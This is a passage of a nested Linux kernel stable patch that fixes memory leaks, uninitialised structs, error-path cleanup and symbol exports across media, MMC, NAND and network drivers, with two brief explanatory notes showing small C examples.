+ 	vpu_iface_unpack_msg_data(inst->core, pkt, (void *)&req_data);
+ 	vpu_trace(inst->dev, "[%d] %d:%d %d:%d %d:%d\n",
+@@ -80,7 +80,7 @@ static void vpu_session_handle_resolution_change(struct vpu_inst *inst, struct v
+ 
+ static void vpu_session_handle_enc_frame_done(struct vpu_inst *inst, struct vpu_rpc_event *pkt)
+ {
+-	struct vpu_enc_pic_info info;
++	struct vpu_enc_pic_info info = { 0 };
+ 
+ 	vpu_iface_unpack_msg_data(inst->core, pkt, (void *)&info);
+ 	dev_dbg(inst->dev, "[%d] frame id = %d, wptr = 0x%x, size = %d\n",
+@@ -90,7 +90,7 @@ static void vpu_session_handle_enc_frame_done(struct vpu_inst *inst, struct vpu_
+ 
+ static void vpu_session_handle_frame_request(struct vpu_inst *inst, struct vpu_rpc_event *pkt)
+ {
+-	struct vpu_fs_info fs;
++	struct vpu_fs_info fs = { 0 };
+ 
+ 	vpu_iface_unpack_msg_data(inst->core, pkt, &fs);
+ 	call_void_vop(inst, event_notify, VPU_MSG_ID_FRAME_REQ, &fs);
+@@ -107,7 +107,7 @@ static void vpu_session_handle_frame_release(struct vpu_inst *inst, struct vpu_r
+ 		info.type = inst->out_format.type;
+ 		call_void_vop(inst, buf_done, &info);
+ 	} else if (inst->core->type == VPU_CORE_TYPE_DEC) {
+-		struct vpu_fs_info fs;
++		struct vpu_fs_info fs = { 0 };
+ 
+ 		vpu_iface_unpack_msg_data(inst->core, pkt, &fs);
+ 		call_void_vop(inst, event_notify, VPU_MSG_ID_FRAME_RELEASE, &fs);
+@@ -122,7 +122,7 @@ static void vpu_session_handle_input_done(struct vpu_inst *inst, struct vpu_rpc_
+ 
+ static void vpu_session_handle_pic_decoded(struct vpu_inst *inst, struct vpu_rpc_event *pkt)
+ {
+-	struct vpu_dec_pic_info info;
++	struct vpu_dec_pic_info info = { 0 };
+ 
+ 	vpu_iface_unpack_msg_data(inst->core, pkt, (void *)&info);
+ 	call_void_vop(inst, get_one_frame, &info);
+@@ -130,7 +130,7 @@ static void vpu_session_handle_pic_decoded(struct vpu_inst *inst, struct vpu_rpc
+ 
+ static void vpu_session_handle_pic_done(struct vpu_inst *inst, struct vpu_rpc_event *pkt)
+ {
+-	struct vpu_dec_pic_info info;
++	struct vpu_dec_pic_info info = { 0 };
+ 	struct vpu_frame_info frame;
+ 
+ 	memset(&frame, 0, sizeof(frame));
+@@ -210,7 +210,7 @@ static int vpu_session_handle_msg(struct vpu_inst *inst, struct vpu_rpc_event *m
+ 		return -EINVAL;
+ 
+ 	msg_id = ret;
+-	dev_dbg(inst->dev, "[%d] receive event(0x%x)\n", inst->id, msg_id);
++	dev_dbg(inst->dev, "[%d] receive event(%s)\n", inst->id, vpu_id_name(msg_id));
+ 
+ 	for (i = 0; i < ARRAY_SIZE(handlers); i++) {
+ 		if (handlers[i].id == msg_id) {
+diff --git a/drivers/media/platform/amphion/vpu_v4l2.c b/drivers/media/platform/amphion/vpu_v4l2.c
+index a74953191c221..e5c8e1a753ccd 100644
+--- a/drivers/media/platform/amphion/vpu_v4l2.c
++++ b/drivers/media/platform/amphion/vpu_v4l2.c
+@@ -404,6 +404,11 @@ static int vpu_vb2_queue_setup(struct vb2_queue *vq,
+ 	for (i = 0; i < cur_fmt->num_planes; i++)
+ 		psize[i] = cur_fmt->sizeimage[i];
+ 
++	if (V4L2_TYPE_IS_OUTPUT(vq->type) && inst->state == VPU_CODEC_STATE_SEEK) {
++		vpu_trace(inst->dev, "reinit when VIDIOC_REQBUFS(OUTPUT, 0)\n");
++		call_void_vop(inst, release);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -688,9 +693,9 @@ int vpu_v4l2_close(struct file *file)
+ 		v4l2_m2m_ctx_release(inst->fh.m2m_ctx);
+ 		inst->fh.m2m_ctx = NULL;
+ 	}
++	call_void_vop(inst, release);
+ 	vpu_inst_unlock(inst);
+ 
+-	call_void_vop(inst, release);
+ 	vpu_inst_unregister(inst);
+ 	vpu_inst_put(inst);
+ 
+diff --git a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
+index 3071b61946c3b..e9a4f8abd21c5 100644
+--- a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
++++ b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
+@@ -1412,6 +1412,7 @@ static int mtk_jpeg_remove(struct platform_device *pdev)
+ {
+ 	struct mtk_jpeg_dev *jpeg = platform_get_drvdata(pdev);
+ 
++	cancel_delayed_work_sync(&jpeg->job_timeout_work);
+ 	pm_runtime_disable(&pdev->dev);
+ 	video_unregister_device(jpeg->vdev);
+ 	v4l2_m2m_release(jpeg->m2m_dev);
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_if.c b/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_if.c
+index 70b8383f7c8ec..a27a109d8d144 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_if.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_if.c
+@@ -226,10 +226,11 @@ static struct vdec_fb *vp9_rm_from_fb_use_list(struct vdec_vp9_inst
+ 		if (fb->base_y.va == addr) {
+ 			list_move_tail(&node->list,
+ 				       &inst->available_fb_node_list);
+-			break;
++			return fb;
+ 		}
+ 	}
+-	return fb;
++
++	return NULL;
+ }
+ 
+ static void vp9_add_to_fb_free_list(struct vdec_vp9_inst *inst,
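[Editorial note] The vdec_vp9_if.c fix returns the frame buffer from inside the loop and NULL after it; the old code returned the loop cursor, which still points at the last visited element when nothing matched. A generic list-search sketch of the corrected shape:

#include <stddef.h>
#include <stdio.h>

struct node { int key; struct node *next; };

/* Correct form: return the match from inside the loop, NULL after it.
 * Returning a variable assigned inside the loop body would hand back
 * the last visited element even when no key matched. */
static struct node *find(struct node *head, int key)
{
	for (struct node *n = head; n; n = n->next)
		if (n->key == key)
			return n;
	return NULL;
}

int main(void)
{
	struct node b = { 2, NULL }, a = { 1, &b };

	printf("hit: %p, miss: %p\n", (void *)find(&a, 2), (void *)find(&a, 5));
	return 0;
}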
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+index 03f8d7cd8eddc..a81212c0ade9d 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+@@ -246,6 +246,7 @@ void vdec_msg_queue_deinit(struct vdec_msg_queue *msg_queue,
+ 			mtk_vcodec_mem_free(ctx, mem);
+ 
+ 		kfree(lat_buf->private_data);
++		lat_buf->private_data = NULL;
+ 	}
+ }
+ 
+@@ -312,6 +313,7 @@ int vdec_msg_queue_init(struct vdec_msg_queue *msg_queue,
+ 	err = mtk_vcodec_mem_alloc(ctx, &msg_queue->wdma_addr);
+ 	if (err) {
+ 		mtk_v4l2_err("failed to allocate wdma_addr buf");
++		msg_queue->wdma_addr.size = 0;
+ 		return -ENOMEM;
+ 	}
+ 	msg_queue->wdma_rptr_addr = msg_queue->wdma_addr.dma_addr;
+diff --git a/drivers/media/platform/qcom/venus/hfi_venus.c b/drivers/media/platform/qcom/venus/hfi_venus.c
+index 2ad40b3945b0b..8fc8f46dc3908 100644
+--- a/drivers/media/platform/qcom/venus/hfi_venus.c
++++ b/drivers/media/platform/qcom/venus/hfi_venus.c
+@@ -131,7 +131,6 @@ struct venus_hfi_device {
+ 
+ static bool venus_pkt_debug;
+ int venus_fw_debug = HFI_DEBUG_MSG_ERROR | HFI_DEBUG_MSG_FATAL;
+-static bool venus_sys_idle_indicator;
+ static bool venus_fw_low_power_mode = true;
+ static int venus_hw_rsp_timeout = 1000;
+ static bool venus_fw_coverage;
+@@ -454,7 +453,6 @@ static int venus_boot_core(struct venus_hfi_device *hdev)
+ 	void __iomem *wrapper_base = hdev->core->wrapper_base;
+ 	int ret = 0;
+ 
+-	writel(BIT(VIDC_CTRL_INIT_CTRL_SHIFT), cpu_cs_base + VIDC_CTRL_INIT);
+ 	if (IS_V6(hdev->core)) {
+ 		mask_val = readl(wrapper_base + WRAPPER_INTR_MASK);
+ 		mask_val &= ~(WRAPPER_INTR_MASK_A2HWD_BASK_V6 |
+@@ -465,6 +463,7 @@ static int venus_boot_core(struct venus_hfi_device *hdev)
+ 	writel(mask_val, wrapper_base + WRAPPER_INTR_MASK);
+ 	writel(1, cpu_cs_base + CPU_CS_SCIACMDARG3);
+ 
++	writel(BIT(VIDC_CTRL_INIT_CTRL_SHIFT), cpu_cs_base + VIDC_CTRL_INIT);
+ 	while (!ctrl_status && count < max_tries) {
+ 		ctrl_status = readl(cpu_cs_base + CPU_CS_SCIACMDARG0);
+ 		if ((ctrl_status & CPU_CS_SCIACMDARG0_ERROR_STATUS_MASK) == 4) {
+@@ -947,17 +946,12 @@ static int venus_sys_set_default_properties(struct venus_hfi_device *hdev)
+ 	if (ret)
+ 		dev_warn(dev, "setting fw debug msg ON failed (%d)\n", ret);
+ 
+-	/*
+-	 * Idle indicator is disabled by default on some 4xx firmware versions,
+-	 * enable it explicitly in order to make suspend functional by checking
+-	 * WFI (wait-for-interrupt) bit.
+-	 */
+-	if (IS_V4(hdev->core) || IS_V6(hdev->core))
+-		venus_sys_idle_indicator = true;
+-
+-	ret = venus_sys_set_idle_message(hdev, venus_sys_idle_indicator);
+-	if (ret)
+-		dev_warn(dev, "setting idle response ON failed (%d)\n", ret);
++	/* HFI_PROPERTY_SYS_IDLE_INDICATOR is not supported beyond 8916 (HFI V1) */
++	if (IS_V1(hdev->core)) {
++		ret = venus_sys_set_idle_message(hdev, false);
++		if (ret)
++			dev_warn(dev, "setting idle response ON failed (%d)\n", ret);
++	}
+ 
+ 	ret = venus_sys_set_power_control(hdev, venus_fw_low_power_mode);
+ 	if (ret)
+diff --git a/drivers/media/tuners/fc0011.c b/drivers/media/tuners/fc0011.c
+index eaa3bbc903d7e..3d3b54be29557 100644
+--- a/drivers/media/tuners/fc0011.c
++++ b/drivers/media/tuners/fc0011.c
+@@ -499,7 +499,7 @@ struct dvb_frontend *fc0011_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(fc0011_attach);
++EXPORT_SYMBOL_GPL(fc0011_attach);
+ 
+ MODULE_DESCRIPTION("Fitipower FC0011 silicon tuner driver");
+ MODULE_AUTHOR("Michael Buesch <m@bues.ch>");
+diff --git a/drivers/media/tuners/fc0012.c b/drivers/media/tuners/fc0012.c
+index 4429d5e8c5796..81e65acbdb170 100644
+--- a/drivers/media/tuners/fc0012.c
++++ b/drivers/media/tuners/fc0012.c
+@@ -495,7 +495,7 @@ err:
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(fc0012_attach);
++EXPORT_SYMBOL_GPL(fc0012_attach);
+ 
+ MODULE_DESCRIPTION("Fitipower FC0012 silicon tuner driver");
+ MODULE_AUTHOR("Hans-Frieder Vogt <hfvogt@gmx.net>");
+diff --git a/drivers/media/tuners/fc0013.c b/drivers/media/tuners/fc0013.c
+index 29dd9b55ff333..1006a2798eefc 100644
+--- a/drivers/media/tuners/fc0013.c
++++ b/drivers/media/tuners/fc0013.c
+@@ -608,7 +608,7 @@ struct dvb_frontend *fc0013_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(fc0013_attach);
++EXPORT_SYMBOL_GPL(fc0013_attach);
+ 
+ MODULE_DESCRIPTION("Fitipower FC0013 silicon tuner driver");
+ MODULE_AUTHOR("Hans-Frieder Vogt <hfvogt@gmx.net>");
+diff --git a/drivers/media/tuners/max2165.c b/drivers/media/tuners/max2165.c
+index 1c746bed51fee..1575ab94e1c8b 100644
+--- a/drivers/media/tuners/max2165.c
++++ b/drivers/media/tuners/max2165.c
+@@ -410,7 +410,7 @@ struct dvb_frontend *max2165_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(max2165_attach);
++EXPORT_SYMBOL_GPL(max2165_attach);
+ 
+ MODULE_AUTHOR("David T. L. Wong <davidtlwong@gmail.com>");
+ MODULE_DESCRIPTION("Maxim MAX2165 silicon tuner driver");
+diff --git a/drivers/media/tuners/mc44s803.c b/drivers/media/tuners/mc44s803.c
+index 0c9161516abdf..ed8bdf7ebd99d 100644
+--- a/drivers/media/tuners/mc44s803.c
++++ b/drivers/media/tuners/mc44s803.c
+@@ -356,7 +356,7 @@ error:
+ 	kfree(priv);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(mc44s803_attach);
++EXPORT_SYMBOL_GPL(mc44s803_attach);
+ 
+ MODULE_AUTHOR("Jochen Friedrich");
+ MODULE_DESCRIPTION("Freescale MC44S803 silicon tuner driver");
+diff --git a/drivers/media/tuners/mt2060.c b/drivers/media/tuners/mt2060.c
+index 322c806228a5a..da7e23c2689b8 100644
+--- a/drivers/media/tuners/mt2060.c
++++ b/drivers/media/tuners/mt2060.c
+@@ -440,7 +440,7 @@ struct dvb_frontend * mt2060_attach(struct dvb_frontend *fe, struct i2c_adapter
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(mt2060_attach);
++EXPORT_SYMBOL_GPL(mt2060_attach);
+ 
+ static int mt2060_probe(struct i2c_client *client,
+ 			const struct i2c_device_id *id)
+diff --git a/drivers/media/tuners/mt2131.c b/drivers/media/tuners/mt2131.c
+index 37f50ff6c0bd2..eebc060883414 100644
+--- a/drivers/media/tuners/mt2131.c
++++ b/drivers/media/tuners/mt2131.c
+@@ -274,7 +274,7 @@ struct dvb_frontend * mt2131_attach(struct dvb_frontend *fe,
+ 	fe->tuner_priv = priv;
+ 	return fe;
+ }
+-EXPORT_SYMBOL(mt2131_attach);
++EXPORT_SYMBOL_GPL(mt2131_attach);
+ 
+ MODULE_AUTHOR("Steven Toth");
+ MODULE_DESCRIPTION("Microtune MT2131 silicon tuner driver");
+diff --git a/drivers/media/tuners/mt2266.c b/drivers/media/tuners/mt2266.c
+index 6136f20fa9b7f..2e92885a6bcb9 100644
+--- a/drivers/media/tuners/mt2266.c
++++ b/drivers/media/tuners/mt2266.c
+@@ -336,7 +336,7 @@ struct dvb_frontend * mt2266_attach(struct dvb_frontend *fe, struct i2c_adapter
+ 	mt2266_calibrate(priv);
+ 	return fe;
+ }
+-EXPORT_SYMBOL(mt2266_attach);
++EXPORT_SYMBOL_GPL(mt2266_attach);
+ 
+ MODULE_AUTHOR("Olivier DANET");
+ MODULE_DESCRIPTION("Microtune MT2266 silicon tuner driver");
+diff --git a/drivers/media/tuners/mxl5005s.c b/drivers/media/tuners/mxl5005s.c
+index ab4c43df9d180..2a8b0ea5d0cd3 100644
+--- a/drivers/media/tuners/mxl5005s.c
++++ b/drivers/media/tuners/mxl5005s.c
+@@ -4116,7 +4116,7 @@ struct dvb_frontend *mxl5005s_attach(struct dvb_frontend *fe,
+ 	fe->tuner_priv = state;
+ 	return fe;
+ }
+-EXPORT_SYMBOL(mxl5005s_attach);
++EXPORT_SYMBOL_GPL(mxl5005s_attach);
+ 
+ MODULE_DESCRIPTION("MaxLinear MXL5005S silicon tuner driver");
+ MODULE_AUTHOR("Steven Toth");
+diff --git a/drivers/media/tuners/qt1010.c b/drivers/media/tuners/qt1010.c
+index 3853a3d43d4f2..60931367b82ca 100644
+--- a/drivers/media/tuners/qt1010.c
++++ b/drivers/media/tuners/qt1010.c
+@@ -440,7 +440,7 @@ struct dvb_frontend * qt1010_attach(struct dvb_frontend *fe,
+ 	fe->tuner_priv = priv;
+ 	return fe;
+ }
+-EXPORT_SYMBOL(qt1010_attach);
++EXPORT_SYMBOL_GPL(qt1010_attach);
+ 
+ MODULE_DESCRIPTION("Quantek QT1010 silicon tuner driver");
+ MODULE_AUTHOR("Antti Palosaari <crope@iki.fi>");
+diff --git a/drivers/media/tuners/tda18218.c b/drivers/media/tuners/tda18218.c
+index 4ed94646116fa..7d8d84dcb2459 100644
+--- a/drivers/media/tuners/tda18218.c
++++ b/drivers/media/tuners/tda18218.c
+@@ -336,7 +336,7 @@ struct dvb_frontend *tda18218_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(tda18218_attach);
++EXPORT_SYMBOL_GPL(tda18218_attach);
+ 
+ MODULE_DESCRIPTION("NXP TDA18218HN silicon tuner driver");
+ MODULE_AUTHOR("Antti Palosaari <crope@iki.fi>");
+diff --git a/drivers/media/tuners/xc2028.c b/drivers/media/tuners/xc2028.c
+index 69c2e1b99bf17..5a967edceca93 100644
+--- a/drivers/media/tuners/xc2028.c
++++ b/drivers/media/tuners/xc2028.c
+@@ -1512,7 +1512,7 @@ fail:
+ 	return NULL;
+ }
+ 
+-EXPORT_SYMBOL(xc2028_attach);
++EXPORT_SYMBOL_GPL(xc2028_attach);
+ 
+ MODULE_DESCRIPTION("Xceive xc2028/xc3028 tuner driver");
+ MODULE_AUTHOR("Michel Ludwig <michel.ludwig@gmail.com>");
+diff --git a/drivers/media/tuners/xc4000.c b/drivers/media/tuners/xc4000.c
+index d59b4ab774302..57ded9ff3f043 100644
+--- a/drivers/media/tuners/xc4000.c
++++ b/drivers/media/tuners/xc4000.c
+@@ -1742,7 +1742,7 @@ fail2:
+ 	xc4000_release(fe);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(xc4000_attach);
++EXPORT_SYMBOL_GPL(xc4000_attach);
+ 
+ MODULE_AUTHOR("Steven Toth, Davide Ferri");
+ MODULE_DESCRIPTION("Xceive xc4000 silicon tuner driver");
+diff --git a/drivers/media/tuners/xc5000.c b/drivers/media/tuners/xc5000.c
+index 7b7d9fe4f9453..2182e5b7b6064 100644
+--- a/drivers/media/tuners/xc5000.c
++++ b/drivers/media/tuners/xc5000.c
+@@ -1460,7 +1460,7 @@ fail:
+ 	xc5000_release(fe);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(xc5000_attach);
++EXPORT_SYMBOL_GPL(xc5000_attach);
+ 
+ MODULE_AUTHOR("Steven Toth");
+ MODULE_DESCRIPTION("Xceive xc5000 silicon tuner driver");
+diff --git a/drivers/media/usb/dvb-usb/m920x.c b/drivers/media/usb/dvb-usb/m920x.c
+index 548199cd86f60..11f4f0455f155 100644
+--- a/drivers/media/usb/dvb-usb/m920x.c
++++ b/drivers/media/usb/dvb-usb/m920x.c
+@@ -277,7 +277,6 @@ static int m920x_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[], int nu
+ 			char *read = kmalloc(1, GFP_KERNEL);
+ 			if (!read) {
+ 				ret = -ENOMEM;
+-				kfree(read);
+ 				goto unlock;
+ 			}
+ 
+@@ -288,8 +287,10 @@ static int m920x_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[], int nu
+ 
+ 				if ((ret = m920x_read(d->udev, M9206_I2C, 0x0,
+ 						      0x20 | stop,
+-						      read, 1)) != 0)
++						      read, 1)) != 0) {
++					kfree(read);
+ 					goto unlock;
++				}
+ 				msg[i].buf[j] = read[0];
+ 			}
+ 
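[Editorial note] The m920x hunk stops kfree()ing a pointer that kmalloc() never returned, and instead frees the buffer on the branch where a read fails mid-loop. Reduced to standard C:

#include <stdio.h>
#include <stdlib.h>

static int xfer(int fail_read)
{
	char *read_buf = malloc(1);

	if (!read_buf)
		return -1;	/* allocation failed: nothing to free */

	if (fail_read) {
		free(read_buf);	/* the fix: free on the failing-read path */
		return -1;
	}

	free(read_buf);
	return 0;
}

int main(void)
{
	printf("fail: %d, ok: %d\n", xfer(1), xfer(0));
	return 0;
}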
+diff --git a/drivers/media/usb/go7007/go7007-i2c.c b/drivers/media/usb/go7007/go7007-i2c.c
+index 38339dd2f83f7..2880370e45c8b 100644
+--- a/drivers/media/usb/go7007/go7007-i2c.c
++++ b/drivers/media/usb/go7007/go7007-i2c.c
+@@ -165,8 +165,6 @@ static int go7007_i2c_master_xfer(struct i2c_adapter *adapter,
+ 		} else if (msgs[i].len == 3) {
+ 			if (msgs[i].flags & I2C_M_RD)
+ 				return -EIO;
+-			if (msgs[i].len != 3)
+-				return -EIO;
+ 			if (go7007_i2c_xfer(go, msgs[i].addr, 0,
+ 					(msgs[i].buf[0] << 8) | msgs[i].buf[1],
+ 					0x01, &msgs[i].buf[2]) < 0)
+diff --git a/drivers/media/usb/siano/smsusb.c b/drivers/media/usb/siano/smsusb.c
+index 640737d3b8aeb..8a39cac76c585 100644
+--- a/drivers/media/usb/siano/smsusb.c
++++ b/drivers/media/usb/siano/smsusb.c
+@@ -455,12 +455,7 @@ static int smsusb_init_device(struct usb_interface *intf, int board_id)
+ 	rc = smscore_register_device(&params, &dev->coredev, 0, mdev);
+ 	if (rc < 0) {
+ 		pr_err("smscore_register_device(...) failed, rc %d\n", rc);
+-		smsusb_term_device(intf);
+-#ifdef CONFIG_MEDIA_CONTROLLER_DVB
+-		media_device_unregister(mdev);
+-#endif
+-		kfree(mdev);
+-		return rc;
++		goto err_unregister_device;
+ 	}
+ 
+ 	smscore_set_board_id(dev->coredev, board_id);
+@@ -477,8 +472,7 @@ static int smsusb_init_device(struct usb_interface *intf, int board_id)
+ 	rc = smsusb_start_streaming(dev);
+ 	if (rc < 0) {
+ 		pr_err("smsusb_start_streaming(...) failed\n");
+-		smsusb_term_device(intf);
+-		return rc;
++		goto err_unregister_device;
+ 	}
+ 
+ 	dev->state = SMSUSB_ACTIVE;
+@@ -486,13 +480,20 @@ static int smsusb_init_device(struct usb_interface *intf, int board_id)
+ 	rc = smscore_start_device(dev->coredev);
+ 	if (rc < 0) {
+ 		pr_err("smscore_start_device(...) failed\n");
+-		smsusb_term_device(intf);
+-		return rc;
++		goto err_unregister_device;
+ 	}
+ 
+ 	pr_debug("device 0x%p created\n", dev);
+ 
+ 	return rc;
++
++err_unregister_device:
++	smsusb_term_device(intf);
++#ifdef CONFIG_MEDIA_CONTROLLER_DVB
++	media_device_unregister(mdev);
++#endif
++	kfree(mdev);
++	return rc;
+ }
+ 
+ static int smsusb_probe(struct usb_interface *intf,
+diff --git a/drivers/media/v4l2-core/v4l2-fwnode.c b/drivers/media/v4l2-core/v4l2-fwnode.c
+index 3d85a8600f576..69c8b3b656860 100644
+--- a/drivers/media/v4l2-core/v4l2-fwnode.c
++++ b/drivers/media/v4l2-core/v4l2-fwnode.c
+@@ -551,19 +551,29 @@ int v4l2_fwnode_parse_link(struct fwnode_handle *fwnode,
+ 	link->local_id = fwep.id;
+ 	link->local_port = fwep.port;
+ 	link->local_node = fwnode_graph_get_port_parent(fwnode);
++	if (!link->local_node)
++		return -ENOLINK;
+ 
+ 	fwnode = fwnode_graph_get_remote_endpoint(fwnode);
+-	if (!fwnode) {
+-		fwnode_handle_put(fwnode);
+-		return -ENOLINK;
+-	}
++	if (!fwnode)
++		goto err_put_local_node;
+ 
+ 	fwnode_graph_parse_endpoint(fwnode, &fwep);
+ 	link->remote_id = fwep.id;
+ 	link->remote_port = fwep.port;
+ 	link->remote_node = fwnode_graph_get_port_parent(fwnode);
++	if (!link->remote_node)
++		goto err_put_remote_endpoint;
+ 
+ 	return 0;
++
++err_put_remote_endpoint:
++	fwnode_handle_put(fwnode);
++
++err_put_local_node:
++	fwnode_handle_put(link->local_node);
++
++	return -ENOLINK;
+ }
+ EXPORT_SYMBOL_GPL(v4l2_fwnode_parse_link);
+ 
+diff --git a/drivers/mmc/host/renesas_sdhi_core.c b/drivers/mmc/host/renesas_sdhi_core.c
+index e38d0e8b8e0ed..7572c5714b469 100644
+--- a/drivers/mmc/host/renesas_sdhi_core.c
++++ b/drivers/mmc/host/renesas_sdhi_core.c
+@@ -1006,6 +1006,8 @@ int renesas_sdhi_probe(struct platform_device *pdev,
+ 		host->sdcard_irq_setbit_mask = TMIO_STAT_ALWAYS_SET_27;
+ 		host->sdcard_irq_mask_all = TMIO_MASK_ALL_RCAR2;
+ 		host->reset = renesas_sdhi_reset;
++	} else {
++		host->sdcard_irq_mask_all = TMIO_MASK_ALL;
+ 	}
+ 
+ 	/* Orginally registers were 16 bit apart, could be 32 or 64 nowadays */
+@@ -1102,9 +1104,7 @@ int renesas_sdhi_probe(struct platform_device *pdev,
+ 		host->ops.hs400_complete = renesas_sdhi_hs400_complete;
+ 	}
+ 
+-	ret = tmio_mmc_host_probe(host);
+-	if (ret < 0)
+-		goto edisclk;
++	sd_ctrl_write32_as_16_and_16(host, CTL_IRQ_MASK, host->sdcard_irq_mask_all);
+ 
+ 	num_irqs = platform_irq_count(pdev);
+ 	if (num_irqs < 0) {
+@@ -1131,6 +1131,10 @@ int renesas_sdhi_probe(struct platform_device *pdev,
+ 			goto eirq;
+ 	}
+ 
++	ret = tmio_mmc_host_probe(host);
++	if (ret < 0)
++		goto edisclk;
++
+ 	dev_info(&pdev->dev, "%s base at %pa, max clock rate %u MHz\n",
+ 		 mmc_hostname(host->mmc), &res->start, host->mmc->f_max / 1000000);
+ 
+diff --git a/drivers/mtd/nand/raw/brcmnand/brcmnand.c b/drivers/mtd/nand/raw/brcmnand/brcmnand.c
+index 2e9c2e2d9c9f7..d8418d7fcc372 100644
+--- a/drivers/mtd/nand/raw/brcmnand/brcmnand.c
++++ b/drivers/mtd/nand/raw/brcmnand/brcmnand.c
+@@ -2612,6 +2612,8 @@ static int brcmnand_setup_dev(struct brcmnand_host *host)
+ 	struct nand_chip *chip = &host->chip;
+ 	const struct nand_ecc_props *requirements =
+ 		nanddev_get_ecc_requirements(&chip->base);
++	struct nand_memory_organization *memorg =
++		nanddev_get_memorg(&chip->base);
+ 	struct brcmnand_controller *ctrl = host->ctrl;
+ 	struct brcmnand_cfg *cfg = &host->hwcfg;
+ 	char msg[128];
+@@ -2633,10 +2635,11 @@ static int brcmnand_setup_dev(struct brcmnand_host *host)
+ 	if (cfg->spare_area_size > ctrl->max_oob)
+ 		cfg->spare_area_size = ctrl->max_oob;
+ 	/*
+-	 * Set oobsize to be consistent with controller's spare_area_size, as
+-	 * the rest is inaccessible.
++	 * Set mtd and memorg oobsize to be consistent with controller's
++	 * spare_area_size, as the rest is inaccessible.
+ 	 */
+ 	mtd->oobsize = cfg->spare_area_size * (mtd->writesize >> FC_SHIFT);
++	memorg->oobsize = mtd->oobsize;
+ 
+ 	cfg->device_size = mtd->size;
+ 	cfg->block_size = mtd->erasesize;
+diff --git a/drivers/mtd/nand/raw/fsmc_nand.c b/drivers/mtd/nand/raw/fsmc_nand.c
+index 6b2bda815b880..17786e1331e6d 100644
+--- a/drivers/mtd/nand/raw/fsmc_nand.c
++++ b/drivers/mtd/nand/raw/fsmc_nand.c
+@@ -1202,9 +1202,14 @@ static int fsmc_nand_suspend(struct device *dev)
+ static int fsmc_nand_resume(struct device *dev)
+ {
+ 	struct fsmc_nand_data *host = dev_get_drvdata(dev);
++	int ret;
+ 
+ 	if (host) {
+-		clk_prepare_enable(host->clk);
++		ret = clk_prepare_enable(host->clk);
++		if (ret) {
++			dev_err(dev, "failed to enable clk\n");
++			return ret;
++		}
+ 		if (host->dev_timings)
+ 			fsmc_nand_setup(host, host->dev_timings);
+ 		nand_reset(&host->nand, 0);
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index dc4d86ceee447..a9000b0ebe690 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -770,21 +770,22 @@ static int spi_nor_write_16bit_sr_and_check(struct spi_nor *nor, u8 sr1)
+ 		ret = spi_nor_read_cr(nor, &sr_cr[1]);
+ 		if (ret)
+ 			return ret;
+-	} else if (nor->params->quad_enable) {
++	} else if (spi_nor_get_protocol_width(nor->read_proto) == 4 &&
++		   spi_nor_get_protocol_width(nor->write_proto) == 4 &&
++		   nor->params->quad_enable) {
+ 		/*
+ 		 * If the Status Register 2 Read command (35h) is not
+ 		 * supported, we should at least be sure we don't
+ 		 * change the value of the SR2 Quad Enable bit.
+ 		 *
+-		 * We can safely assume that when the Quad Enable method is
+-		 * set, the value of the QE bit is one, as a consequence of the
+-		 * nor->params->quad_enable() call.
++		 * When the Quad Enable method is set and the buswidth is 4, we
++		 * can safely assume that the value of the QE bit is one, as a
++		 * consequence of the nor->params->quad_enable() call.
+ 		 *
+-		 * We can safely assume that the Quad Enable bit is present in
+-		 * the Status Register 2 at BIT(1). According to the JESD216
+-		 * revB standard, BFPT DWORDS[15], bits 22:20, the 16-bit
+-		 * Write Status (01h) command is available just for the cases
+-		 * in which the QE bit is described in SR2 at BIT(1).
++		 * According to the JESD216 revB standard, BFPT DWORDS[15],
++		 * bits 22:20, the 16-bit Write Status (01h) command is
++		 * available just for the cases in which the QE bit is
++		 * described in SR2 at BIT(1).
+ 		 */
+ 		sr_cr[1] = SR2_QUAD_EN_BIT1;
+ 	} else {
+diff --git a/drivers/net/arcnet/arcnet.c b/drivers/net/arcnet/arcnet.c
+index 1bad1866ae462..a48220f91a2df 100644
+--- a/drivers/net/arcnet/arcnet.c
++++ b/drivers/net/arcnet/arcnet.c
+@@ -468,7 +468,7 @@ static void arcnet_reply_tasklet(struct tasklet_struct *t)
+ 
+ 	ret = sock_queue_err_skb(sk, ackskb);
+ 	if (ret)
+-		kfree_skb(ackskb);
++		dev_kfree_skb_irq(ackskb);
+ 
+ 	local_irq_enable();
+ };
+diff --git a/drivers/net/can/usb/gs_usb.c b/drivers/net/can/usb/gs_usb.c
+index 5858cbafbc965..264a0f764e011 100644
+--- a/drivers/net/can/usb/gs_usb.c
++++ b/drivers/net/can/usb/gs_usb.c
+@@ -626,6 +626,9 @@ static void gs_usb_receive_bulk_callback(struct urb *urb)
+ 	}
+ 
+ 	if (hf->flags & GS_CAN_FLAG_OVERFLOW) {
++		stats->rx_over_errors++;
